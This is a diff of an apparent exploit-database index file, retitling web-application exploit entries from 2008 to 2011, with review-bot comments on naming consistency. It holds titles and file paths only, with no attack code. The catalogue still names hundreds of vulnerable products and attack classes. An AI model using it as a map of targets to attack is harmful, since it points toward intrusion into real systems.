@@ -19813,7 +19823,7 @@ id,file,description,date,author,platform,type,port 7002,platforms/php/webapps/7002.txt,"Joomla! Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0 7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'moreinfo.php pg' SQL Injection",2008-11-05,G4N0K,php,webapps,0 7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - SQL Injection (Authentication Bypass)",2008-11-05,"Hussin X",php,webapps,0 -7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 +7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0 7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - (recid) SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0 7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps,0 
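Review bot: The new title for row 7005 removes "SQL Injection" entirely, so the entry no longer shows up under its vulnerability class, while the context row 7008 keeps "(Authentication Bypass) SQL Injection" and row 7004 uses "SQL Injection (Authentication Bypass)". Prefer the 7004 form here, "PHP JOBWEBSITE PRO - SQL Injection (Authentication Bypass)", which removes the leading parentheses without losing the class.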
@@ -19824,7 +19834,7 @@ id,file,description,date,author,platform,type,port 7014,platforms/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - (Authentication Bypass) SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 7016,platforms/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 -7017,platforms/php/webapps/7017.txt,"Pre ADS Portal 2.0 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0 +7017,platforms/php/webapps/7017.txt,"Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting",2008-11-06,G4N0K,php,webapps,0 7018,platforms/php/webapps/7018.txt,"NICE FAQ Script - (Authentication Bypass) SQL Injection",2008-11-06,r45c4l,php,webapps,0 7019,platforms/php/webapps/7019.txt,"Arab Portal 2.1 (Windows) - Remote File Disclosure",2008-11-06,"Khashayar Fereidani",php,webapps,0 7020,platforms/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion",2008-11-06,"Vinod Sharma",php,webapps,0 
@@ -19864,7 +19874,7 @@ id,file,description,date,author,platform,type,port 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,php,webapps,0 7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0 -7064,platforms/php/webapps/7064.pl,"Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0 +7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0 7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Parameter Local File Inclusion",2008-11-08,dun,php,webapps,0 7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0 7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0 
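Review bot: Row 7064 changes the name itself, not only the formatting: 'com_n-forms' (plural) becomes "n-form" (singular), and the other renamed component rows in this patch are capitalised (N-Gallery, Articles, Galleries) while this one is not. Please confirm which spelling matches the component in 7064.pl and keep the com_ identifier if the display name cannot be verified.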
@@ -19941,7 +19951,7 @@ id,file,description,date,author,platform,type,port 7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - (notes send) SQL Injection",2008-11-19,cOndemned,php,webapps,0 7162,platforms/php/webapps/7162.pl,"MauryCMS 0.53.2 - Arbitrary File Upload",2008-11-19,StAkeR,php,webapps,0 7163,platforms/php/webapps/7163.txt,"RevSense - (Authentication Bypass) SQL Injection",2008-11-19,d3b4g,php,webapps,0 -7164,platforms/php/webapps/7164.txt,"Pre Job Board - (Authentication Bypass) SQL Injection",2008-11-19,R3d-D3V!L,php,webapps,0 +7164,platforms/php/webapps/7164.txt,"Pre Job Board - Authentication Bypass",2008-11-19,R3d-D3V!L,php,webapps,0 7165,platforms/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload",2008-11-19,Osirys,php,webapps,0 7166,platforms/php/webapps/7166.txt,"AskPert - (Authentication Bypass) SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0 7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion",2008-11-20,StAkeR,php,webapps,0 
@@ -20138,7 +20148,7 @@ id,file,description,date,author,platform,type,port 7407,platforms/php/webapps/7407.txt,"WebMaster Marketplace - 'member.php u' SQL Injection",2008-12-10,"Hussin X",php,webapps,0 7408,platforms/php/webapps/7408.txt,"living Local 1.1 - (Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0 7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0 -7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - (view.php id) SQL Injection",2008-12-10,Osirys,php,webapps,0 +7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection",2008-12-10,Osirys,php,webapps,0 7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0 7413,platforms/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7414,platforms/asp/webapps/7414.txt,"CF_Auction - (forummessage) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 
@@ -20679,7 +20689,7 @@ id,file,description,date,author,platform,type,port 8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0 8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0 8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion",2009-03-17,Garry,php,webapps,0 -8237,platforms/php/webapps/8237.txt,"facil-cms 0.1rc2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 +8237,platforms/php/webapps/8237.txt,"Facil-CMS 0.1RC2 - Multiple Vulnerabilities",2009-03-18,any.zicky,php,webapps,0 8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps,0 8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' Parameter SQL Injection",2009-03-18,girex,php,webapps,0 
@@ -20901,7 +20911,7 @@ id,file,description,date,author,platform,type,port 8664,platforms/php/webapps/8664.pl,"BigACE 2.5 - SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0 -8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - (member) SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0 +8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0 8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0 8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0 8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0 
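Review bot: Row 8671 loses "(member)" with no replacement, leaving a bare "Family Connections CMS 1.9 - SQL Injection" that no longer says which input is affected. Elsewhere in this patch the parenthesised name is converted rather than deleted (row 5802 goes from "(tsk_id)" to "'tsk_id' Parameter"), so use "'member' Parameter SQL Injection" here, or note in the commit message why member is not a parameter.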
@@ -21477,7 +21487,7 @@ id,file,description,date,author,platform,type,port 9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0 9604,platforms/php/webapps/9604.txt,"Joomla! Component com_Joomlaoc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0 9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0 -9609,platforms/php/webapps/9609.txt,"Mambo Component 'com_hestar' - SQL Injection",2009-09-09,M3NW5,php,webapps,0 +9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0 9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0 
@@ -21547,7 +21557,7 @@ id,file,description,date,author,platform,type,port 9826,platforms/php/webapps/9826.txt,"MindSculpt CMS - SQL Injection",2009-09-24,kaMitEz,php,webapps,0 9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection / Cross-Site Scripting",2009-09-23,"Alexey Sintsov",php,webapps,0 9830,platforms/php/webapps/9830.txt,"Cour Supreme - SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0 -9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component 'com_tupinambis' - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0 +9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component Tupinambis - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0 9833,platforms/php/webapps/9833.txt,"Joomla! Component com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments - SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 9835,platforms/php/webapps/9835.txt,"HB CMS 1.7 - SQL Injection",2009-09-22,"Securitylab Security Research",php,webapps,0 
@@ -21651,7 +21661,7 @@ id,file,description,date,author,platform,type,port 10169,platforms/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps,0 10170,platforms/multiple/webapps/10170.txt,"Xerver 4.31 / 4.32 - HTTP Response Splitting",2009-11-18,s4squatch,multiple,webapps,80 10177,platforms/php/webapps/10177.txt,"Joomla! Extension iF Portfolio Nexus - SQL Injection",2009-11-18,"599eme Man",php,webapps,0 -10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component 'com_ezine' 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0 +10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component D4J eZine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0 10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0 10183,platforms/php/webapps/10183.php,"Joomla! 1.5.12 TinyMCE - Remote Code Execution (via Arbitrary File Upload)",2009-11-19,daath,php,webapps,80 
@@ -22002,7 +22012,7 @@ id,file,description,date,author,platform,type,port 10741,platforms/php/webapps/10741.txt,"Cybershade CMS 0.2 - Remote File Inclusion",2009-12-27,Mr.SeCreT,php,webapps,0 10742,platforms/php/webapps/10742.txt,"Joomla! Component com_dhforum - SQL Injection",2009-12-27,ViRuSMaN,php,webapps,0 10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup",2009-12-26,indoushka,php,webapps,0 -10750,platforms/php/webapps/10750.txt,"Mambo Component 'com_materialsuche' 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0 +10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0 10751,platforms/php/webapps/10751.txt,"Dream4 Koobi Pro 6.1 Gallery - 'img_id' Parameter SQL Injection",2009-12-27,BILGE_KAGAN,php,webapps,0 10752,platforms/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80 10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80 
@@ -22076,9 +22086,9 @@ id,file,description,date,author,platform,type,port 10861,platforms/php/webapps/10861.txt,"Discuz 1.03 - SQL Injection",2009-12-31,indoushka,php,webapps,0 10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) Local File Inclusion",2009-12-31,cOndemned,php,webapps,0 10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - (Authentication Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Parameter Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10874,platforms/php/webapps/10874.txt,"Pre News Manager - (nid) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10874,platforms/php/webapps/10874.txt,"Pre News Manager - 'nid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz - SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10877,platforms/php/webapps/10877.txt,"PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup",2009-12-31,indoushka,php,webapps,0 
@@ -22360,7 +22370,7 @@ id,file,description,date,author,platform,type,port 11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0 -11446,platforms/php/webapps/11446.txt,"Mambo Component 'com_akogallery' - SQL Injection",2010-02-14,snakespc,php,webapps,0 +11446,platforms/php/webapps/11446.txt,"Mambo Component AkoGallery - SQL Injection",2010-02-14,snakespc,php,webapps,0 11447,platforms/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Arbitrary File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0 11449,platforms/php/webapps/11449.txt,"Joomla! Component com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0 
@@ -22523,7 +22533,7 @@ id,file,description,date,author,platform,type,port 11711,platforms/php/webapps/11711.txt,"Azeno CMS - SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0 11715,platforms/php/webapps/11715.txt,"systemsoftware Community Black - 'index.php' SQL Injection",2010-03-13,"Easy Laster",php,webapps,0 11718,platforms/php/webapps/11718.txt,"Xbtit 2.0.0 - SQL Injection",2010-03-13,Ctacok,php,webapps,0 -11719,platforms/php/webapps/11719.txt,"Mambo Component 'com_mambads' - SQL Injection",2010-03-13,Dreadful,php,webapps,0 +11719,platforms/php/webapps/11719.txt,"Mambo Component MambAds - SQL Injection",2010-03-13,Dreadful,php,webapps,0 11721,platforms/php/webapps/11721.txt,"GeekHelps ADMP 1.01 - Multiple Vulnerabilities",2010-03-13,ITSecTeam,php,webapps,0 11722,platforms/php/webapps/11722.txt,"Ad Board Script 1.01 - Local File Inclusion",2010-03-13,ITSecTeam,php,webapps,0 11723,platforms/cgi/webapps/11723.pl,"Trouble Ticket Express 3.01 - Remote Code Execution / Directory Traversal",2010-03-14,zombiefx,cgi,webapps,0 
@@ -22738,7 +22748,7 @@ id,file,description,date,author,platform,type,port 12057,platforms/php/webapps/12057.txt,"Joomla! Component 'com_press' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 12058,platforms/php/webapps/12058.txt,"Joomla! Component 'com_joomlapicasa' 2.0 - Local File Inclusion",2010-04-04,Vrs-hCk,php,webapps,0 12060,platforms/php/webapps/12060.txt,"Joomla! Component 'com_serie' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 -12061,platforms/php/webapps/12061.txt,"Facil-CMS - (Local File Inclusion / Remote File Inclusion)",2010-04-04,eidelweiss,php,webapps,0 +12061,platforms/php/webapps/12061.txt,"Facil-CMS 0.1RC2 - Local / Remote File Inclusion",2010-04-04,eidelweiss,php,webapps,0 12062,platforms/php/webapps/12062.txt,"Joomla! Component 'com_ranking' - SQL Injection",2010-04-04,"DevilZ TM",php,webapps,0 12065,platforms/php/webapps/12065.txt,"Joomla! Component 'com_jinventory' - Local File Inclusion",2010-04-05,"Chip d3 bi0s",php,webapps,0 12066,platforms/php/webapps/12066.txt,"Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion",2010-04-05,Vrs-hCk,php,webapps,0 
@@ -22933,7 +22943,7 @@ id,file,description,date,author,platform,type,port 12369,platforms/php/webapps/12369.txt,"Madirish Webmail 2.01 - 'baseDir' Remote File Inclusion / Local File Inclusion",2010-04-24,eidelweiss,php,webapps,0 12370,platforms/php/webapps/12370.txt,"NCT Jobs Portal Script - Cross-Site Scripting / Authentication Bypass",2010-04-24,Sid3^effects,php,webapps,0 12371,platforms/php/webapps/12371.txt,"WHMCS control (WHMCompleteSolution) - SQL Injection",2010-04-24,"Islam DefenDers",php,webapps,0 -12372,platforms/php/webapps/12372.txt,"AskMe Pro 2.1 - (que_id) SQL Injection",2010-04-24,v3n0m,php,webapps,0 +12372,platforms/php/webapps/12372.txt,"Alstrasoft AskMe Pro 2.1 - 'que_id' Parameter SQL Injection",2010-04-24,v3n0m,php,webapps,0 12373,platforms/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 12374,platforms/php/webapps/12374.txt,"G5 Scripts Guestbook PHP 1.2.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 12376,platforms/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Arbitrary File Upload",2010-04-24,eidelweiss,php,webapps,0 
@@ -23361,7 +23371,7 @@ id,file,description,date,author,platform,type,port 13866,platforms/php/webapps/13866.txt,"Joke Website Script - SQL Injection / Cross-Site Scripting",2010-06-14,Valentin,php,webapps,0 13867,platforms/php/webapps/13867.txt,"E-Book Store - SQL Injection",2010-06-14,Valentin,php,webapps,0 13880,platforms/asp/webapps/13880.txt,"Smart ASP Survey - Cross-Site Scripting / SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 -13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - SQL Injection Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0 +13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0 13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System - user_login.asp SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13883,platforms/asp/webapps/13883.txt,"Business Classified Listing - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13884,platforms/asp/webapps/13884.txt,"Restaurant Listing with Online Ordering - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 
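Review bot: the new 13881 title, "Pre Job Board Pro - Authentication Bypass", no longer says that the bypass is done through SQL injection, so a search of the description column for SQL Injection stops returning this row. The neighbouring 13880 and 13882 rows keep the class in their titles; a form such as "Authentication Bypass (SQL Injection)" would keep 13881 findable both ways.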
@@ -23797,7 +23807,7 @@ id,file,description,date,author,platform,type,port 14819,platforms/php/webapps/14819.html,"Pc4Uploader 9.0 - Cross-Site Request Forgery",2010-08-27,RENO,php,webapps,0 14820,platforms/php/webapps/14820.txt,"iGaming CMS - Multiple SQL Injections",2010-08-27,Sweet,php,webapps,0 14821,platforms/asp/webapps/14821.txt,"Shop Creator 4.0 - SQL Injection",2010-08-27,Pouya_Server,asp,webapps,0 -14822,platforms/php/webapps/14822.txt,"DiY-CMS 1.0 - Multiple Remote File Inclusion",2010-08-28,LoSt.HaCkEr,php,webapps,0 +14822,platforms/php/webapps/14822.txt,"DIY-CMS 1.0 - Multiple Remote File Inclusion",2010-08-28,LoSt.HaCkEr,php,webapps,0 14823,platforms/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,php,webapps,0 14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection",2010-08-28,Valentin,php,webapps,0 14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",php,webapps,0 
@@ -23859,10 +23869,9 @@ id,file,description,date,author,platform,type,port 14969,platforms/asp/webapps/14969.txt,"ASP Nuke - SQL Injection",2010-09-11,Abysssec,asp,webapps,0 14973,platforms/php/webapps/14973.txt,"piwigo-2.1.2 - Multiple Vulnerabilities",2010-09-11,Sweet,php,webapps,0 14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 - SQL Injection / Authentication Bypass",2010-09-12,"YuGj VN",php,webapps,0 -14979,platforms/php/webapps/14979.txt,"Alstrasoft AskMe Pro 2.1 - (forum_answer.php?que_id) SQL Injection",2010-09-12,Amine_92,php,webapps,0 14980,platforms/asp/webapps/14980.txt,"eshtery CMS - SQL Injection",2010-09-12,Abysssec,asp,webapps,0 14985,platforms/php/webapps/14985.txt,"System Shop - (Module aktka) SQL Injection",2010-09-12,secret,php,webapps,0 -14986,platforms/php/webapps/14986.txt,"Alstrasoft AskMe Pro 2.1 - (profile.php?id) SQL Injection",2010-09-12,CoBRa_21,php,webapps,0 +14986,platforms/php/webapps/14986.txt,"Alstrasoft AskMe Pro 2.1 - 'profile.php' SQL Injection",2010-09-12,CoBRa_21,php,webapps,0 14988,platforms/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection",2010-09-13,ViciOuS,php,webapps,0 14989,platforms/php/webapps/14989.txt,"osDate - 'uploadvideos.php' Arbitrary File Upload",2010-09-13,Xa7m3d,php,webapps,0 14991,platforms/asp/webapps/14991.txt,"Luftguitar CMS - Upload Arbitrary File",2010-09-13,Abysssec,asp,webapps,0 
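Review bot: row 14979 is deleted and nothing in this hunk says where it went. It reads as a duplicate of 12372, which an earlier hunk retitles to "Alstrasoft AskMe Pro 2.1 - 'que_id' Parameter SQL Injection", but that surviving title omits forum_answer.php, the one detail 14979 carried. Please confirm that platforms/php/webapps/14979.txt is removed in the same commit. The 14986 retitle also goes the other way: it keeps 'profile.php' and drops the id parameter, so the two AskMe Pro rows now follow different conventions.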
@@ -24098,7 +24107,7 @@ id,file,description,date,author,platform,type,port 15517,platforms/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,php,webapps,0 15518,platforms/php/webapps/15518.txt,"Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0 15519,platforms/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0 -15524,platforms/php/webapps/15524.txt,"Pre Ads Portal - SQL Bypass",2010-11-13,Cru3l.b0y,php,webapps,0 +15524,platforms/php/webapps/15524.txt,"Pre ADS Portal - Authentication Bypass",2010-11-13,Cru3l.b0y,php,webapps,0 15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection",2010-11-14,v3n0m,php,webapps,0 15526,platforms/php/webapps/15526.txt,"Pre Online Tests Generator Pro - SQL Injection",2010-11-13,Cru3l.b0y,php,webapps,0 15550,platforms/php/webapps/15550.txt,"vBulletin 4.0.8 - Persistent Cross-Site Scripting via Profile Customization",2010-11-16,MaXe,php,webapps,0 
@@ -24518,7 +24527,7 @@ id,file,description,date,author,platform,type,port 17035,platforms/php/webapps/17035.pl,"Constructr CMS 3.03 - Arbitrary File Upload",2011-03-23,plucky,php,webapps,0 17036,platforms/asp/webapps/17036.txt,"Web Wiz Forum - Injection",2011-03-23,eXeSoul,asp,webapps,0 17046,platforms/php/webapps/17046.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (2)",2011-03-24,"High-Tech Bridge SA",php,webapps,0 -17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - (POST) Persistent Cross-Site Scripting / XML Injection",2011-03-26,LiquidWorm,php,webapps,0 +17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - Persistent Cross-Site Scripting / XML Injection",2011-03-26,LiquidWorm,php,webapps,0 17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0 17054,platforms/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",php,webapps,0 17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution - Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0 
@@ -25035,10 +25044,10 @@ id,file,description,date,author,platform,type,port 18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System - Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0 18192,platforms/php/webapps/18192.txt,"Joomla! Component 'com_jobprofile' - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0 18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 / 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0 -18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 / 2.7.1 - (less.php) Remote Command Execution",2011-12-04,mr_me,php,webapps,0 +18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 / 2.7.1 - 'less.php' Remote Command Execution",2011-12-04,mr_me,php,webapps,0 18202,platforms/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' - SQL Injection",2011-12-05,"Stefan Schurtz",php,webapps,0 18207,platforms/php/webapps/18207.txt,"Alstrasoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps,0 -18208,platforms/php/webapps/18208.rb,"Family Connections CMS - 'less.php' Remote Command Execution (Metasploit)",2011-12-07,Metasploit,php,webapps,0 +18208,platforms/php/webapps/18208.rb,"Family Connections CMS 2.7.1 - 'less.php' Remote Command Execution (Metasploit)",2011-12-07,Metasploit,php,webapps,0 18215,platforms/php/webapps/18215.txt,"SourceBans 1.4.8 - SQL Injection / Local File Inclusion Injection",2011-12-07,Havok,php,webapps,0 18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,php,webapps,0 18218,platforms/php/webapps/18218.txt,"Joomla! Component 'com_qcontacts' 1.0.6 - SQL Injection",2011-12-08,Don,php,webapps,0 
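Review bot: 18208 now pins the Metasploit module to 2.7.1 while 18198, the same 'less.php' issue a few rows up, is listed as 2.5.0 / 2.7.1. If the module applies to the same range, the title should say so; if it was only verified on 2.7.1, that deserves a line in the commit message, since the two rows otherwise read as covering different versions.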
